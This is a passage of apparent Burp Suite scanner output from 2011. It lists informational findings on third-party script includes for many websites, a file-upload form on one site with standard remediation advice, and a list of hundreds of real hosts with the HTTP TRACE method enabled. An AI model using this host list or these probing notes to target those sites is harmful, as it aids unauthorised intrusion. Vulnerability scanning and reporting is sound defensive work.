User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stopsacidreflux.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:11:31 GMT
Server: Apache
Content-Type: text/html
Content-Length: 16819

<html>

   <head>
       <meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
       <meta name="generator" content="Adobe GoLive 6">
       <title>StopsAcidReflux.com - Home Page - Amish Formula to
...[SNIP]...

<script type="text/javascript" src="http://server4.web-stat.com/wtslog.js">
</script>
...[SNIP]...
<font size="3">There are
                                           <script language="JavaScript" src="http://server4.web-stat.com/connection_count.pl?al172859:3:######"></script>
...[SNIP]...

20.68. http://www.tahoedailytribune.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tahoedailytribune.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

Response

20.69. http://www.tcoasttalk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tcoasttalk.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/experience_util.js
http://alt.coxnewsweb.com/cnishared/omniture/sc_cxnt_h15.js
http://alt.coxnewsweb.com/coxnet/js/brightcove/metrics.js
http://alt.coxnewsweb.com/palmbeachpost/js/random-ng.js
http://alt.coxnewsweb.com/palmbeachpost/js/vendor-ads/RP01.js
http://alt.coxnewsweb.com/palmbeachpost/js/vendor-ads/RP02.js
http://alt.coxnewsweb.com/palmbeachpost/js/vendor-ads/mhe/tcoasttalk/yahoo-bundle.js
http://w.sharethis.com/widget/?wp=2.7.1&publisher=663666ec-17d6-4b5b-a920-21297c7c9132

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tcoasttalk.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:56:59 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.tcoasttalk.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:56:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 39466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://w.sharethis.com/widget/?wp=2.7.1&publisher=663666ec-17d6-4b5b-a920-21297c7c9132"></script>
...[SNIP]...
<center><script type='text/javascript' language="JavaScript" src="http://alt.coxnewsweb.com/palmbeachpost/js/random-ng.js"></script>
<script type='text/javascript' language="JavaScript" src="http://alt.coxnewsweb.com/palmbeachpost/js/vendor-ads/mhe/tcoasttalk/yahoo-bundle.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://alt.coxnewsweb.com/palmbeachpost/js/vendor-ads/RP01.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://alt.coxnewsweb.com/palmbeachpost/js/vendor-ads/RP02.js"></script>
...[SNIP]...
</div>
<script src="http://admin.brightcove.com/js/experience_util.js" type="text/javascript"></script>
...[SNIP]...

<script src="http://alt.coxnewsweb.com/coxnet/js/brightcove/metrics.js"></script>
<script type="text/javascript" src="http://alt.coxnewsweb.com/cnishared/omniture/sc_cxnt_h15.js"></script>
...[SNIP]...

20.70. http://www.tempcredit.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tempcredit.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://www.adfusion.com/adfusion.partnersite/b6be9cf1-7cab-483f-88a9-f8cfed15b1ac.aspx

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tempcredit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

20.71. http://www.teriskitchen.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.teriskitchen.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.teriskitchen.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:38:45 GMT
Server: Apache/1.3.27 (Unix) mod_perl/1.27 PHP/4.2.3 mod_fastcgi/2.2.12 FrontPage/5.0.2.2510 mod_jk/1.2.0 mod_ssl/2.8.11 OpenSSL/0.9.6g
Last-Modified: Mon, 20 Jul 2009 18:43:52 GMT
ETag: "679a8d-24e4-4a64bae8"
Accept-Ranges: bytes
Content-Length: 9444
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>Teri's Kitchen - Missing File</TITLE>
<META NAME="keywords" CONTENT="food, recipes, cooking, recipe, family recipes, cooking recipes, recipe collection, traditional recipes, it
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

20.72. http://www.ticketleap.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ticketleap.net
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

https://lct.salesforce.com/sfga.js

Request

Response

20.73. http://www.tireteam.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tireteam.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

https://seal.networksolutions.com/siteseal/javascript/siteseal.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tireteam.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

20.74. http://www.torontolife.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.torontolife.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://connect.facebook.net/en_US/all.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.torontolife.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Server: nginx/0.6.35
Date: Tue, 03 May 2011 11:31:35 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding,Cookie
Content-Length: 44759

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<link rel="apple-touch-icon" href="http://media.torontolife.com/graphics/icons/tl-apple-icon.png"/>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<div id="facebook-like-box">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div id="more-features">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

20.75. http://www.uwstout.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.uwstout.edu
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uwstout.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 18123
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 11:32:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- Conte
...[SNIP]...
<div class="twoColumnLeft">

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" ></script>
...[SNIP]...

20.76. http://www.vc.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vc.edu
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vc.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=1036549;expires=Thu, 25-Apr-2041 10:37:23 GMT;path=/
Set-Cookie: CFTOKEN=c9ed98125e6d8b65-165D0D47-D954-B9B6-E7BCBA3CF75B99B5;expires=Thu, 25-Apr-2041 10:37:23 GMT;path=/
Set-Cookie: JSESSIONID=8430f8d03a4cffc5679c5026747373c65324;path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:37:23 GMT
Content-Length: 36781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.77. http://www.visitsouth.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.visitsouth.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/spcjs.php?id=19893&target=_blank
http://edge.quantserve.com/quant.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.visitsouth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 03 May 2011 10:47:03 GMT
Content-Length: 21244
Date: Tue, 03 May 2011 10:47:03 GMT
X-Varnish: 289976442
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.158
X-Cache: MISS

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

<meta http-equiv=
...[SNIP]...
</script>
<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=19893&target=_blank'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.78. http://www.vivalagames.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vivalagames.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.statcounter.com/counter/counter.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vivalagames.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:45:58 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 5836

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>VivaLaGames.Com - 404 Not Found</title><link rel="stylesheet" href="http://www.vivalagames.com/style.css">
<scr
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>

<script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

20.79. http://www.voa.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.voa.org
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a8429606240c599

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.voa.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

20.80. http://www.wdasfm.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wdasfm.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://widget.ldrhub.com/embed.php?key=WDAS

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wdasfm.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 3393420834 3393377093
X-Cache-Server: varnish01
Expires: Tue, 03 May 2011 10:29:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:29:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40856

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - 105.3 WDAS-FM Philly's Best R&B and Classic Soul!
...[SNIP]...
</script>
<script type="text/javascript" src="http://widget.ldrhub.com/embed.php?key=WDAS"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.81. http://www.wendoverfun.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wendoverfun.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wendoverfun.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 22 Apr 2011 19:34:29 GMT
Accept-Ranges: bytes
ETag: "40d95b4c241cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:22:43 GMT
Content-Length: 13360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.82. http://www.womensenews.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.womensenews.org
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.womensenews.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

20.83. http://www.xcomment.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xcomment.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://media.fastclick.net/w/get.media?sid=39393&m=1&tp=5&d=j&t=s

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

21. File upload functionality previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yardbarker.com
Path:	/javascripts/all.js

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://www.yardbarker.com/comment/new_comment_media?objectid="+ objectid +"

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defence-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

Request

GET /javascripts/all.js?stamp=1300906814 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.yardbarker.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Tue, 03 May 2011 17:08:26 GMT
Content-Type: application/x-javascript
Last-Modified: Thu, 03 Feb 2011 23:10:06 GMT
Connection: keep-alive
Keep-Alive: timeout=2
Content-Length: 278620

/* Prototype JavaScript framework, version 1.6.0.3
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototyp
...[SNIP]...
<input id='media_"+ commentid +"_image_temp' name='media_"+ commentid +"[image_temp]' type='hidden' /><input id='media_"+ commentid +"_image' name='media_"+ commentid +"[image]' size='30' type='file' /><br>
...[SNIP]...

22. TRACE method is enabled previous next
There are 739 instances of this issue:

http://ads.specificmedia.com/
http://bh.contextweb.com/
http://cache.specificmedia.com/
http://d.xp1.ru4.com/
http://domainunion.de/
http://image2.pubmatic.com/
http://leeenterprises.112.2o7.net/
http://pixel.rubiconproject.com/
http://r.openx.net/
http://tags.bluekai.com/
http://www.1-800-volunteer.org/
http://www.123-reg.co.uk/
http://www.1280.com/
http://www.20minutos.es/
http://www.2benet.net/
http://www.321gold.com/
http://www.321search.com/
http://www.3happybytes.com/
http://www.3reef.com/
http://www.48hourcashsystem.com/
http://www.4m.net/
http://www.a-russian-girl.com/
http://www.abbee.com/
http://www.aboutarc.com/
http://www.aboutnursing.com/
http://www.abzolute.net/
http://www.actionsearch.info/
http://www.activehire.com/
http://www.adddev2.com/
http://www.addgfs.com/
http://www.adhostingsolutions.com/
http://www.adnet.de/
http://www.aerotrader.com/
http://www.afciviliancareers.com/
http://www.afibstroke.com/
http://www.agathachristie.com/
http://www.agingeye.net/
http://www.agonist.org/
http://www.aipbjobs.com/
http://www.airgunsofarizona.com/
http://www.albireo.ch/
http://www.allbran.com/
http://www.allegiance.com/
http://www.alltrails.com/
http://www.alltribes.com/
http://www.altermedia.info/
http://www.amasci.com/
http://www.amateurclipz.com/
http://www.americandiscountcruises.com/
http://www.aminus3.com/
http://www.ancestralfindings.com/
http://www.anonymousspace.com/
http://www.antiquecar.com/
http://www.applianceguru.com/
http://www.appointmentquest.com/
http://www.aqua-teens.com/
http://www.aquabid.com/
http://www.armpitpicture.com/
http://www.artbusiness.com/
http://www.aryion.com/
http://www.asb.tv/
http://www.ashmax.com/
http://www.asianage.com/
http://www.asianmovielola.com/
http://www.askdocweb.com/
http://www.askdramy.com/
http://www.astridsangelcash.com/
http://www.authentic-campaigner.com/
http://www.avidpromedical.com/
http://www.awssettlement.com/
http://www.b92.net/
http://www.babynamescountry.com/
http://www.babynamespedia.com/
http://www.bagsnob.com/
http://www.bakersfieldcollege.edu/
http://www.bbing.org/
http://www.bbspot.com/
http://www.beangroup.com/
http://www.beautifulkiss.com/
http://www.bebelsecurity26.com/
http://www.belcan.com/
http://www.beloblog.com/
http://www.belowtopsecret.com/
http://www.bestfastresult.com/
http://www.bestwesternmichigan.com/
http://www.bibleatlas.org/
http://www.bigagnes.com/
http://www.bigbrilliant.com/
http://www.bigtitcreampie.com/
http://www.blackpast.org/
http://www.bloomsburgfair.com/
http://www.blueprintaffiliates.com/
http://www.bluesforpeace.com/
http://www.boardingschoolreview.com/
http://www.bobmovs.com/
http://www.boomboomflicks.com/
http://www.boyextra.com/
http://www.boymale.net/
http://www.boyvipdream.com/
http://www.braba.com/
http://www.branditz.com/
http://www.brazilianbikinishop.com/
http://www.breastfeeding.com/
http://www.broadbandinfo.com/
http://www.broadbandsports.com/
http://www.brostoons.com/
http://www.brusselsjournal.com/
http://www.brutalkingdom.com/
http://www.bvonstyle.com/
http://www.cabinetparts.com/
http://www.cabinsusa.com/
http://www.californiasciencecenter.org/
http://www.callsource.com/
http://www.cancure.org/
http://www.caraddict4addicts.com/
http://www.cardschat.com/
http://www.carolinanavy.com/
http://www.carports.com/
http://www.carsandinsurance.com/
http://www.cartoonplus.net/
http://www.cartoonterritory.com/
http://www.cash-advances-in-1-hour.com/
http://www.cash-program.com/
http://www.catxoxo.com/
http://www.cavtel.com/
http://www.cayenne.com/
http://www.cbtagclouds.com/
http://www.ccsdschools.com/
http://www.celebsauce.com/
http://www.census-online.us/
http://www.channelseca.com/
http://www.cheatoogle.com/
http://www.childdevelopmentinfo.com/
http://www.christusrex.org/
http://www.cieaura.com/
http://www.circumstitions.com/
http://www.cirruscasino.net/
http://www.citydeals.com/
http://www.cixos.com/
http://www.clairesslaves.com/
http://www.cleanjoke.com/
http://www.clevelandcountyschools.org/
http://www.clevelandgolf.com/
http://www.click-now.net/
http://www.collectibledetective.com/
http://www.collegeotr.com/
http://www.coloring-page.com/
http://www.coloringcastle.com/
http://www.com-sub.biz/
http://www.commerceinsurance.com/
http://www.concreteexchange.com/
http://www.consumertipsonline.net/
http://www.contextads.net/
http://www.coolsearchtoday.com/
http://www.corestandards.org/
http://www.corning.com/
http://www.costcentral.com/
http://www.createdebate.com/
http://www.credit-time.net/
http://www.criminal-records.org/
http://www.critics.com/
http://www.cumshotsdb.com/
http://www.cureresearch.com/
http://www.cyber-seek.com/
http://www.cyberfinder.com/
http://www.dabbledb.com/
http://www.dadamo.com/
http://www.dailybethea.com/
http://www.dailycognition.com/
http://www.dailynylongalleries.com/
http://www.dandyproject.com/
http://www.davidmovie.com/
http://www.davison.com/
http://www.daycare.com/
http://www.deanza.edu/
http://www.dearesq.com/
http://www.debtgoal.com/
http://www.deguate.com/
http://www.deluxnetworks.com/
http://www.desert-tropicals.com/
http://www.dex.com/
http://www.dhlive.com/
http://www.diethealthclub.com/
http://www.diplodrivers.com/
http://www.dispatchinteractive.com/
http://www.divorcemag.com/
http://www.dizzydrive.com/
http://www.doghouseboxing.com/
http://www.domainshop.com/
http://www.domainunion.de/
http://www.donga.com/
http://www.donnan.com/
http://www.dotcells.com/
http://www.dotzup.com/
http://www.downrange.tv/
http://www.downy.com/
http://www.dressupdollgames.net/
http://www.dsmtuners.com/
http://www.dude.com/
http://www.dulcolaxusa.com/
http://www.dynamictoolbar.com/
http://www.easyjob.net/
http://www.ebar.com/
http://www.ebooknetworking.net/
http://www.edenbridals.com/
http://www.edgarsnyder.com/
http://www.edison.com/
http://www.eeeuser.com/
http://www.efashioncentral.com/
http://www.eforo.com/
http://www.electrical-online.com/
http://www.electronickits.com/
http://www.electronicsinfoline.com/
http://www.elmresources.com/
http://www.elook.org/
http://www.emporia.edu/
http://www.endlesspools.com/
http://www.endoftheamericandream.com/
http://www.engineerjobs.com/
http://www.entertainment-savings-offers.com/
http://www.epdfsearch.com/
http://www.erelopro.com/
http://www.eslbee.com/
http://www.eslteachersboard.com/
http://www.everestcollege.edu/
http://www.expedient.com/
http://www.exploringthenorth.com/
http://www.extranet-post.com/
http://www.extremecashrobot.com/
http://www.extremecow.com/
http://www.extremefunnyhumor.com/
http://www.extremeoverclocking.com/
http://www.ez.ro/
http://www.factsfacts.com/
http://www.fadfusion.com/
http://www.familycorner.com/
http://www.farturl.com/
http://www.fastfreevideos.com/
http://www.fastpartner.net/
http://www.fbschedules.com/
http://www.fed-pack.com/
http://www.feetpics.net/
http://www.fileforums.com/
http://www.filmjabber.com/
http://www.filters-now.com/
http://www.findstudentloans.com/
http://www.firstweber.com/
http://www.fixcomputerblog.com/
http://www.flashanywhere.net/
http://www.florida.com/
http://www.fluke.com/
http://www.flvsoft.com/
http://www.fmaware.org/
http://www.forconstructionpros.com/
http://www.foreclosed-government-homes.com/
http://www.forministry.com/
http://www.formsguru.com/
http://www.fortunecity.co.uk/
http://www.foxyhousewives.com/
http://www.fr.st/
http://www.france3.fr/
http://www.free-graphics.com/
http://www.free-music-downloads.ws/
http://www.freeapphosting.com/
http://www.freecenter.com/
http://www.freecheckings.com/
http://www.freefever.com/
http://www.freemomsvideo.com/
http://www.freevistafiles.com/
http://www.freexpreviews.com/
http://www.freshwebmaster.com/
http://www.friendship-poems.com/
http://www.friestube.com/
http://www.fromoldbooks.org/
http://www.fullsizebronco.com/
http://www.funcel.mobi/
http://www.funcityfinder.com/
http://www.fundmojo.com/
http://www.furninfo.com/
http://www.fxsound.com/
http://www.gameguidedog.com/
http://www.gamingnewslink.com/
http://www.gardens.com/
http://www.getmarci.com/
http://www.getmyhomesvalue.com/
http://www.getzips.com/
http://www.gigamoves.com/
http://www.girlsontherun.org/
http://www.glowfoto.com/
http://www.gocurrency.com/
http://www.godempire.org/
http://www.goldcycler.com/
http://www.googleimages.com/
http://www.gospelmusic.org.uk/
http://www.governmentregistry.org/
http://www.govpaynow.com/
http://www.grandcanyon.com/
http://www.grandpaandteen.com/
http://www.grannyhound.com/
http://www.grannyroom.com/
http://www.grillpro.com/
http://www.gruntsmilitary.com/
http://www.gtplanet.net/
http://www.guide4home.com/
http://www.guideseek.com/
http://www.guitarscanada.com/
http://www.guweb.com/
http://www.h2onews.org/
http://www.haircuttery.com/
http://www.hairycabin.com/
http://www.handgunforum.net/
http://www.hatchetgear.com/
http://www.hd-blow.com/
http://www.hd.org/
http://www.hd4sale.com/
http://www.healthx.com/
http://www.hiltonhawaiianvillage.com/
http://www.hintergrund.de/
http://www.hireteen.com/
http://www.hiusa.org/
http://www.homebasedofficework.com/
http://www.homedistiller.org/
http://www.homeinsurance.com/
http://www.homepage-baukasten.de/
http://www.hopkins-arthritis.org/
http://www.hot-mature-diary.com/
http://www.hot-mom.org/
http://www.hotcelebrity.name/
http://www.hotsweeps4u.com/
http://www.hottlady.com/
http://www.hqhomeclips.com/
http://www.hrbskillslearningcenter.com/
http://www.htmate2.com/
http://www.i.ph/
http://www.ibmsaudio.com/
http://www.idilis.ro/
http://www.ihousenet.com/
http://www.imageenvision.com/
http://www.imagetwist.com/
http://www.indthegap.com/
http://www.inform.com/
http://www.innvista.com/
http://www.instant-cash-source.com/
http://www.integratelecom.com/
http://www.inthe90s.com/
http://www.intimasian.com/
http://www.investorsdailyedge.net/
http://www.ionchannels.org/
http://www.ipodarcade.com/
http://www.irfanview.net/
http://www.isagoodies.com/
http://www.itmonline.org/
http://www.jamaica-star.com/
http://www.jameshardie.com/
http://www.jawdroppingasses.com/
http://www.jaxed.com/
http://www.jayd-lovely.net/
http://www.jeffcopublicschools.org/
http://www.jinni.com/
http://www.jjgames.com/
http://www.jkharris.com/
http://www.justrightcreations.net/
http://www.k1speed.com/
http://www.kalpoint.com/
http://www.kampsight.com/
http://www.katsmovies.com/
http://www.kbhgames.com/
